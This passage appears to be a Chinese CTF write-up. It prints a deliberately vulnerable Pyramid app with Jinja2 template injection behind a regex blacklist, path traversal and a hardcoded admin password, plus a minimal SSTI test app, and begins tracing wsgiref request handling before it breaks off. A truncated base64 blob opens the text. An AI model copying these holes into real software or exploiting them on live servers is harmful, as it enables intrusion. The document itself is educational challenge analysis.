HS2xvgL0ZrzQvghQ1pLwb9JziSuisyB1blmoBgLrStHHubf7MMdj6U9sHv4MgYHZ/HrfD2GHdfvqqHkxtyvHg0y4TyKoQQQiRJp0cI8aWX/hD8qC/RBOwbILgOVqXfeXkAVi2Ccy/DAQvYDWnfhWF31ixnGdSw++/g5L8Ec2qjBVD857DbCcHK8TsBADojBF+G3Ub4aur+/f1gNsLJ5Ocpn30CF1N/PAjmUdb5+L+Eq07Y8Odp78ZJrvPw/wEnn4ENj6b94I/w5rkxElkA1TXJ8kvr6H11Lnx/HYRr4PE8jkgTyasQQgiRIsPbhBBfeuZn4Ytn81v2L/4a/vNfj/69/Tn4YiIbL4C/WQnnxrmzMq458MJz8MI4iz1ggS8s+a3yq/8C/p8xJgT4Cxt8kcedqIzfjFN+eckzr0IIIUSK3OkRQgghhBBCzGjS6RFCCCGEEELMaNLpEUIIIYQQQsxo0ukRQgghhBBCzGjS6RFCCCGEEELMaPd88cUXE5poSAghhBBCCPHlc/nyZQoKCob+u+eee4b+BUb8eyeROz1CCCGEEEKIGU06PUIIIYQQQogZTTo9QgghhBBCiBlNOj1CCCGEEEKIGU06PUIIIYQQQogZTT
|
|||
|
|
<p>读取出来了</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kn>import</span> <span class=nn>jinja2</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>config</span> <span class=kn>import</span> <span class=nn>Configurator</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>httpexceptions</span> <span class=kn>import</span> <span class=nn>HTTPFound</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>response</span> <span class=kn>import</span> <span class=nn>Response</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>session</span> <span class=kn>import</span> <span class=nn>SignedCookieSessionFactory</span>
|
|||
|
|
<span class=n>from</span> <span class=n>wsgiref</span><span class=o>.</span><span class=na>simple_server</span> <span class=kn>import</span> <span class=nn>make_server</span>
|
|||
|
|
<span class=n>from</span> <span class=n>Captcha</span> <span class=kn>import</span> <span class=nn>captcha_image_view</span><span class=o>,</span> <span class=n>captcha_store</span>
|
|||
|
|
<span class=kn>import</span> <span class=nn>re</span>
|
|||
|
|
<span class=kn>import</span> <span class=nn>os</span>
|
|||
|
|
|
|||
|
|
<span class=kd>class</span> <span class=nc>User</span><span class=o>:</span>
|
|||
|
|
<span class=n>def</span> <span class=nf>__init__</span><span class=o>(</span><span class=n>self</span><span class=o>,</span> <span class=n>username</span><span class=o>,</span> <span class=n>password</span><span class=o>):</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>username</span> <span class=o>=</span> <span class=n>username</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>password</span> <span class=o>=</span> <span class=n>password</span>
|
|||
|
|
|
|||
|
|
<span class=n>users</span> <span class=o>=</span> <span class=o>{</span><span class=s>"admin"</span><span class=o>:</span> <span class=n>User</span><span class=o>(</span><span class=s>"admin"</span><span class=o>,</span> <span class=s>"123456"</span><span class=o>)}</span>
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>root_view</span><span class=o>(</span><span class=n>request</span><span class=o>):</span>
|
|||
|
|
<span class=err>#</span> <span class=n>重定向到</span> <span class=o>/</span><span class=n>login</span>
|
|||
|
|
<span class=k>return</span> <span class=nf>HTTPFound</span><span class=o>(</span><span class=n>location</span><span class=o>=</span><span class=err>'</span><span class=o>/</span><span class=n>login</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>info_view</span><span class=o>(</span><span class=n>request</span><span class=o>):</span>
|
|||
|
|
<span class=err>#</span> <span class=n>查看细节内容</span>
|
|||
|
|
<span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=na>session</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>username</span><span class=err>'</span><span class=o>)</span> <span class=o>!=</span> <span class=err>'</span><span class=n>admin</span><span class=err>'</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=s>"请先登录"</span><span class=o>,</span> <span class=n>status</span><span class=o>=</span><span class=mi>403</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>file_name</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>params</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>file</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>file_base</span><span class=o>,</span> <span class=n>file_extension</span> <span class=o>=</span> <span class=n>os</span><span class=o>.</span><span class=na>path</span><span class=o>.</span><span class=na>splitext</span><span class=o>(</span><span class=n>file_name</span><span class=o>)</span>
|
|||
|
|
<span class=k>if</span> <span class=n>file_name</span><span class=o>:</span>
|
|||
|
|
<span class=n>file_path</span> <span class=o>=</span> <span class=n>os</span><span class=o>.</span><span class=na>path</span><span class=o>.</span><span class=na>join</span><span class=o>(</span><span class=err>'</span><span class=o>/</span><span class=n>app</span><span class=o>/</span><span class=kd>static</span><span class=o>/</span><span class=n>details</span><span class=o>/</span><span class=err>'</span><span class=o>,</span> <span class=n>file_name</span><span class=o>)</span>
|
|||
|
|
<span class=k>try</span><span class=o>:</span>
|
|||
|
|
<span class=n>with</span> <span class=nf>open</span><span class=o>(</span><span class=n>file_path</span><span class=o>,</span> <span class=sc>'r'</span><span class=o>,</span> <span class=n>encoding</span><span class=o>=</span><span class=err>'</span><span class=n>utf</span><span class=o>-</span><span class=mi>8</span><span class=err>'</span><span class=o>)</span> <span class=n>as</span> <span class=n>f</span><span class=o>:</span>
|
|||
|
|
<span class=n>content</span> <span class=o>=</span> <span class=n>f</span><span class=o>.</span><span class=na>read</span><span class=o>()</span>
|
|||
|
|
<span class=n>print</span><span class=o>(</span><span class=n>content</span><span class=o>)</span>
|
|||
|
|
<span class=n>except</span> <span class=n>FileNotFoundError</span><span class=o>:</span>
|
|||
|
|
<span class=n>content</span> <span class=o>=</span> <span class=s>"文件未找到。"</span>
|
|||
|
|
<span class=k>else</span><span class=o>:</span>
|
|||
|
|
<span class=n>content</span> <span class=o>=</span> <span class=s>"未提供文件名。"</span>
|
|||
|
|
|
|||
|
|
<span class=k>return</span> <span class=o>{</span><span class=err>'</span><span class=n>file_name</span><span class=err>'</span><span class=o>:</span> <span class=n>file_name</span><span class=o>,</span> <span class=err>'</span><span class=n>content</span><span class=err>'</span><span class=o>:</span> <span class=n>content</span><span class=o>,</span> <span class=err>'</span><span class=n>file_base</span><span class=err>'</span><span class=o>:</span> <span class=n>file_base</span><span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>home_view</span><span class=o>(</span><span class=n>request</span><span class=o>):</span>
|
|||
|
|
<span class=err>#</span> <span class=n>主路由</span>
|
|||
|
|
<span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=na>session</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>username</span><span class=err>'</span><span class=o>)</span> <span class=o>!=</span> <span class=err>'</span><span class=n>admin</span><span class=err>'</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=s>"请先登录"</span><span class=o>,</span> <span class=n>status</span><span class=o>=</span><span class=mi>403</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>detailtxt</span> <span class=o>=</span> <span class=n>os</span><span class=o>.</span><span class=na>listdir</span><span class=o>(</span><span class=err>'</span><span class=o>/</span><span class=n>app</span><span class=o>/</span><span class=kd>static</span><span class=o>/</span><span class=n>details</span><span class=o>/</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>picture_list</span> <span class=o>=</span> <span class=o>[</span><span class=n>i</span><span class=o>[:</span><span class=n>i</span><span class=o>.</span><span class=na>index</span><span class=o>(</span><span class=sc>'.'</span><span class=o>)]</span> <span class=k>for</span> <span class=n>i</span> <span class=n>in</span> <span class=n>detailtxt</span><span class=o>]</span>
|
|||
|
|
<span class=n>file_contents</span> <span class=o>=</span> <span class=o>{}</span>
|
|||
|
|
<span class=k>for</span> <span class=n>picture</span> <span class=n>in</span> <span class=n>picture_list</span><span class=o>:</span>
|
|||
|
|
<span class=n>with</span> <span class=nf>open</span><span class=o>(</span><span class=n>f</span><span class=s>"/app/static/details/{picture}.txt"</span><span class=o>,</span> <span class=s>"r"</span><span class=o>,</span> <span class=n>encoding</span><span class=o>=</span><span class=err>'</span><span class=n>utf</span><span class=o>-</span><span class=mi>8</span><span class=err>'</span><span class=o>)</span> <span class=n>as</span> <span class=n>f</span><span class=o>:</span>
|
|||
|
|
<span class=n>file_contents</span><span class=o>[</span><span class=n>picture</span><span class=o>]</span> <span class=o>=</span> <span class=n>f</span><span class=o>.</span><span class=na>read</span><span class=o>(</span><span class=mi>80</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=k>return</span> <span class=o>{</span><span class=err>'</span><span class=n>picture_list</span><span class=err>'</span><span class=o>:</span> <span class=n>picture_list</span><span class=o>,</span> <span class=err>'</span><span class=n>file_contents</span><span class=err>'</span><span class=o>:</span> <span class=n>file_contents</span><span class=o>}</span>
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>login_view</span><span class=o>(</span><span class=n>request</span><span class=o>):</span>
|
|||
|
|
<span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=na>method</span> <span class=o>==</span> <span class=err>'</span><span class=n>POST</span><span class=err>'</span><span class=o>:</span>
|
|||
|
|
<span class=n>username</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>POST</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>username</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>password</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>POST</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>password</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>user_captcha</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>POST</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>captcha</span><span class=err>'</span><span class=o>,</span> <span class=err>''</span><span class=o>).</span><span class=na>upper</span><span class=o>()</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=n>user_captcha</span> <span class=o>!=</span> <span class=n>captcha_store</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>captcha_text</span><span class=err>'</span><span class=o>,</span> <span class=err>''</span><span class=o>):</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=s>"验证码错误,请重试。"</span><span class=o>)</span>
|
|||
|
|
<span class=n>user</span> <span class=o>=</span> <span class=n>users</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>username</span><span class=o>)</span>
|
|||
|
|
<span class=k>if</span> <span class=n>user</span> <span class=n>and</span> <span class=n>user</span><span class=o>.</span><span class=na>password</span> <span class=o>==</span> <span class=n>password</span><span class=o>:</span>
|
|||
|
|
<span class=n>request</span><span class=o>.</span><span class=na>session</span><span class=o>[</span><span class=err>'</span><span class=n>username</span><span class=err>'</span><span class=o>]</span> <span class=o>=</span> <span class=n>username</span>
|
|||
|
|
<span class=k>return</span> <span class=nf>Response</span><span class=o>(</span><span class=s>"登录成功!&lt;a href='/home'&gt;点击进入主页&lt;/a&gt;"</span><span class=o>)</span>
|
|||
|
|
<span class=k>else</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=s>"用户名或密码错误。"</span><span class=o>)</span>
|
|||
|
|
<span class=k>return</span> <span class=o>{}</span>
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>shell_view</span><span class=o>(</span><span class=n>request</span><span class=o>):</span>
|
|||
|
|
<span class=k>if</span> <span class=n>request</span><span class=o>.</span><span class=na>session</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>username</span><span class=err>'</span><span class=o>)</span> <span class=o>!=</span> <span class=err>'</span><span class=n>admin</span><span class=err>'</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=s>"请先登录"</span><span class=o>,</span> <span class=n>status</span><span class=o>=</span><span class=mi>403</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>expression</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>GET</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>shellcmd</span><span class=err>'</span><span class=o>,</span> <span class=err>''</span><span class=o>)</span>
|
|||
|
|
<span class=n>blacklist_patterns</span> <span class=o>=</span> <span class=o>[</span><span class=n>r</span><span class=err>'</span><span class=o>.*</span><span class=n>length</span><span class=o>.*</span><span class=err>'</span><span class=o>,</span><span class=n>r</span><span class=err>'</span><span class=o>.*</span><span class=n>count</span><span class=o>.*</span><span class=err>'</span><span class=o>,</span><span class=n>r</span><span class=err>'</span><span class=o>.*[</span><span class=mi>0</span><span class=o>-</span><span class=mi>9</span><span class=o>].*</span><span class=err>'</span><span class=o>,</span><span class=n>r</span><span class=err>'</span><span class=o>.*</span><span class=err>\</span><span class=o>..*</span><span class=err>'</span><span class=o>,</span><span class=n>r</span><span class=err>'</span><span class=o>.*</span><span class=n>soft</span><span class=o>.*</span><span class=err>'</span><span class=o>,</span><span class=n>r</span><span class=err>'</span><span class=o>.*%.*</span><span class=err>'</span><span class=o>]</span>
|
|||
|
|
<span class=k>if</span> <span class=n>any</span><span class=o>(</span><span class=n>re</span><span class=o>.</span><span class=na>search</span><span class=o>(</span><span class=n>pattern</span><span class=o>,</span> <span class=n>expression</span><span class=o>)</span> <span class=k>for</span> <span class=n>pattern</span> <span class=n>in</span> <span class=n>blacklist_patterns</span><span class=o>):</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=err>'</span><span class=n>wafwafwaf</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=k>try</span><span class=o>:</span>
|
|||
|
|
<span class=n>result</span> <span class=o>=</span> <span class=n>jinja2</span><span class=o>.</span><span class=na>Environment</span><span class=o>(</span><span class=n>loader</span><span class=o>=</span><span class=n>jinja2</span><span class=o>.</span><span class=na>BaseLoader</span><span class=o>()).</span><span class=na>from_string</span><span class=o>(</span><span class=n>expression</span><span class=o>).</span><span class=na>render</span><span class=o>({</span><span class=s>"request"</span><span class=o>:</span> <span class=n>request</span><span class=o>})</span>
|
|||
|
|
<span class=k>if</span> <span class=n>result</span> <span class=o>!=</span> <span class=n>None</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=err>'</span><span class=n>success</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=k>else</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=err>'</span><span class=n>error</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>except</span> <span class=n>Exception</span> <span class=n>as</span> <span class=n>e</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=err>'</span><span class=n>error</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>main</span><span class=o>():</span>
|
|||
|
|
<span class=n>session_factory</span> <span class=o>=</span> <span class=n>SignedCookieSessionFactory</span><span class=o>(</span><span class=err>'</span><span class=n>secret_key</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>with</span> <span class=nf>Configurator</span><span class=o>(</span><span class=n>session_factory</span><span class=o>=</span><span class=n>session_factory</span><span class=o>)</span> <span class=n>as</span> <span class=n>config</span><span class=o>:</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>include</span><span class=o>(</span><span class=err>'</span><span class=n>pyramid_chameleon</span><span class=err>'</span><span class=o>)</span> <span class=err>#</span> <span class=n>添加渲染模板</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_static_view</span><span class=o>(</span><span class=n>name</span><span class=o>=</span><span class=err>'</span><span class=kd>static</span><span class=err>'</span><span class=o>,</span> <span class=n>path</span><span class=o>=</span><span class=err>'</span><span class=o>/</span><span class=n>app</span><span class=o>/</span><span class=kd>static</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>set_default_permission</span><span class=o>(</span><span class=err>'</span><span class=n>view</span><span class=err>'</span><span class=o>)</span> <span class=err>#</span> <span class=n>设置默认权限为view</span>
|
|||
|
|
|
|||
|
|
<span class=err>#</span> <span class=n>注册路由</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>root</span><span class=err>'</span><span class=o>,</span> <span class=sc>'/'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>captcha</span><span class=err>'</span><span class=o>,</span> <span class=err>'</span><span class=o>/</span><span class=n>captcha</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>home</span><span class=err>'</span><span class=o>,</span> <span class=err>'</span><span class=o>/</span><span class=n>home</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>info</span><span class=err>'</span><span class=o>,</span> <span class=err>'</span><span class=o>/</span><span class=n>info</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>login</span><span class=err>'</span><span class=o>,</span> <span class=err>'</span><span class=o>/</span><span class=n>login</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>shell</span><span class=err>'</span><span class=o>,</span> <span class=err>'</span><span class=o>/</span><span class=n>shell</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=err>#</span> <span class=n>注册视图</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>root_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>root</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>captcha_image_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>captcha</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>home_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>home</span><span class=err>'</span><span class=o>,</span> <span class=n>renderer</span><span class=o>=</span><span class=err>'</span><span class=n>home</span><span class=o>.</span><span class=na>pt</span><span class=err>'</span><span class=o>,</span> <span class=n>permission</span><span class=o>=</span><span class=err>'</span><span class=n>view</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>info_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>info</span><span class=err>'</span><span class=o>,</span> <span class=n>renderer</span><span class=o>=</span><span class=err>'</span><span class=n>details</span><span class=o>.</span><span class=na>pt</span><span class=err>'</span><span class=o>,</span> <span class=n>permission</span><span class=o>=</span><span class=err>'</span><span class=n>view</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>login_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>login</span><span class=err>'</span><span class=o>,</span> <span class=n>renderer</span><span class=o>=</span><span class=err>'</span><span class=n>login</span><span class=o>.</span><span class=na>pt</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>shell_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>shell</span><span class=err>'</span><span class=o>,</span> <span class=n>renderer</span><span class=o>=</span><span class=err>'</span><span class=n>string</span><span class=err>'</span><span class=o>,</span> <span class=n>permission</span><span class=o>=</span><span class=err>'</span><span class=n>view</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>scan</span><span class=o>()</span>
|
|||
|
|
<span class=n>app</span> <span class=o>=</span> <span class=n>config</span><span class=o>.</span><span class=na>make_wsgi_app</span><span class=o>()</span>
|
|||
|
|
<span class=k>return</span> <span class=n>app</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=n>__name__</span> <span class=o>==</span> <span class=s>"__main__"</span><span class=o>:</span>
|
|||
|
|
<span class=n>app</span> <span class=o>=</span> <span class=n>main</span><span class=o>()</span>
|
|||
|
|
<span class=n>server</span> <span class=o>=</span> <span class=n>make_server</span><span class=o>(</span><span class=err>'</span><span class=mf>0.0.0.0</span><span class=err>'</span><span class=o>,</span> <span class=mi>6543</span><span class=o>,</span> <span class=n>app</span><span class=o>)</span>
|
|||
|
|
<span class=n>server</span><span class=o>.</span><span class=na>serve_forever</span><span class=o>()</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>这里就不跟着出题人的源码走了,和出题人沟通过,它想打不出网无回显的,但是一些原因,导致不能这样设置 docker ,然后无奈就只能禁用一些命令然后限制反弹 shell<br>
|
|||
|
|
这里我们直接写一个纯享版本的代码</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=kn>import</span> <span class=nn>jinja2</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>config</span> <span class=kn>import</span> <span class=nn>Configurator</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>response</span> <span class=kn>import</span> <span class=nn>Response</span>
|
|||
|
|
<span class=n>from</span> <span class=n>pyramid</span><span class=o>.</span><span class=na>view</span> <span class=kn>import</span> <span class=nn>view_config</span>
|
|||
|
|
<span class=n>from</span> <span class=n>wsgiref</span><span class=o>.</span><span class=na>simple_server</span> <span class=kn>import</span> <span class=nn>make_server</span>
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>get_jinja2_environment</span><span class=o>():</span>
|
|||
|
|
<span class=k>return</span> <span class=n>jinja2</span><span class=o>.</span><span class=na>Environment</span><span class=o>(</span><span class=n>loader</span><span class=o>=</span><span class=n>jinja2</span><span class=o>.</span><span class=na>FileSystemLoader</span><span class=o>(</span><span class=err>'</span><span class=n>templates</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=nd>@view_config</span><span class=o>(</span><span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>home</span><span class=err>'</span><span class=o>,</span> <span class=n>renderer</span><span class=o>=</span><span class=err>'</span><span class=n>home</span><span class=o>.</span><span class=na>pt</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=n>def</span> <span class=nf>home_view</span><span class=o>(</span><span class=n>request</span><span class=o>):</span>
|
|||
|
|
<span class=n>expression</span> <span class=o>=</span> <span class=n>request</span><span class=o>.</span><span class=na>GET</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=err>'</span><span class=n>expression</span><span class=err>'</span><span class=o>,</span> <span class=err>''</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=err>#</span> <span class=n>模板注入漏洞</span><span class=o>:</span> <span class=n>直接渲染用户输入的字符串</span>
|
|||
|
|
<span class=k>try</span><span class=o>:</span>
|
|||
|
|
<span class=n>result</span> <span class=o>=</span> <span class=n>jinja2</span><span class=o>.</span><span class=na>Environment</span><span class=o>(</span><span class=n>loader</span><span class=o>=</span><span class=n>jinja2</span><span class=o>.</span><span class=na>BaseLoader</span><span class=o>()).</span><span class=na>from_string</span><span class=o>(</span><span class=n>expression</span><span class=o>).</span><span class=na>render</span><span class=o>({</span><span class=s>"request"</span><span class=o>:</span> <span class=n>request</span><span class=o>})</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=n>f</span><span class=s>"渲染结果: {result}"</span><span class=o>)</span>
|
|||
|
|
<span class=n>except</span> <span class=n>Exception</span> <span class=n>as</span> <span class=n>e</span><span class=o>:</span>
|
|||
|
|
<span class=k>return</span> <span class=n>Response</span><span class=o>(</span><span class=n>f</span><span class=s>"错误: {str(e)}"</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=n>def</span> <span class=nf>main</span><span class=o>():</span>
|
|||
|
|
<span class=n>with</span> <span class=nf>Configurator</span><span class=o>()</span> <span class=n>as</span> <span class=n>config</span><span class=o>:</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_route</span><span class=o>(</span><span class=err>'</span><span class=n>home</span><span class=err>'</span><span class=o>,</span> <span class=sc>'/'</span><span class=o>)</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_view</span><span class=o>(</span><span class=n>home_view</span><span class=o>,</span> <span class=n>route_name</span><span class=o>=</span><span class=err>'</span><span class=n>home</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
|
|||
|
|
<span class=err>#</span> <span class=n>设置</span> <span class=n>Jinja2</span> <span class=n>模板环境</span>
|
|||
|
|
<span class=n>config</span><span class=o>.</span><span class=na>add_renderer</span><span class=o>(</span><span class=err>'</span><span class=o>.</span><span class=na>pt</span><span class=err>'</span><span class=o>,</span> <span class=n>get_jinja2_environment</span><span class=o>())</span>
|
|||
|
|
|
|||
|
|
<span class=err>#</span> <span class=n>创建应用</span>
|
|||
|
|
<span class=n>app</span> <span class=o>=</span> <span class=n>config</span><span class=o>.</span><span class=na>make_wsgi_app</span><span class=o>()</span>
|
|||
|
|
<span class=k>return</span> <span class=n>app</span>
|
|||
|
|
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=n>__name__</span> <span class=o>==</span> <span class=s>"__main__"</span><span class=o>:</span>
|
|||
|
|
<span class=n>app</span> <span class=o>=</span> <span class=n>main</span><span class=o>()</span>
|
|||
|
|
<span class=n>server</span> <span class=o>=</span> <span class=n>make_server</span><span class=o>(</span><span class=err>'</span><span class=mf>0.0.0.0</span><span class=err>'</span><span class=o>,</span> <span class=mi>6543</span><span class=o>,</span> <span class=n>app</span><span class=o>)</span>
|
|||
|
|
<span class=n>server</span><span class=o>.</span><span class=na>serve_forever</span><span class=o>()</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>我是准备打 header 回显的,内存马的话应该会复杂许多,按照 flask 的思路的话我们这里需要去找到类似于 flask 中的 WSGIRequestHandler 的对象来处理我们的请求的</p>
|
|||
|
|
<p>这里调试分析一波<br>
|
|||
|
|
按照栈<br>
|
|||
|
|
⚠️upload failed, check dev console</p>
|
|||
|
|
<p>我们还是按照以前的思路,寻找处理请求的过程</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>process_request</span><span class=o>(</span><span class=n>self</span><span class=o>,</span> <span class=n>request</span><span class=o>,</span> <span class=n>client_address</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Call finish_request.</span>
|
|||
|
|
|
|||
|
|
<span class=s>Overridden by ForkingMixIn and ThreadingMixIn.</span>
|
|||
|
|
|
|||
|
|
<span class=s>"""</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>finish_request</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>client_address</span><span class=o>)</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>shutdown_request</span><span class=o>(</span><span class=n>request</span><span class=o>)</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>应该还是 finish_request</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>finish_request</span><span class=o>(</span><span class=n>self</span><span class=o>,</span> <span class=n>request</span><span class=o>,</span> <span class=n>client_address</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Finish one request by instantiating RequestHandlerClass."""</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>RequestHandlerClass</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>client_address</span><span class=o>,</span> <span class=n>self</span><span class=o>)</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>这里实例化了我们的处理类</p>
|
|||
|
|
<p>然后就开始调用处理类的 handle 方法了</p>
|
|||
|
|
<p>方法如下</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>handle</span><span class=o>(</span><span class=n>self</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Handle a single HTTP request"""</span>
|
|||
|
|
|
|||
|
|
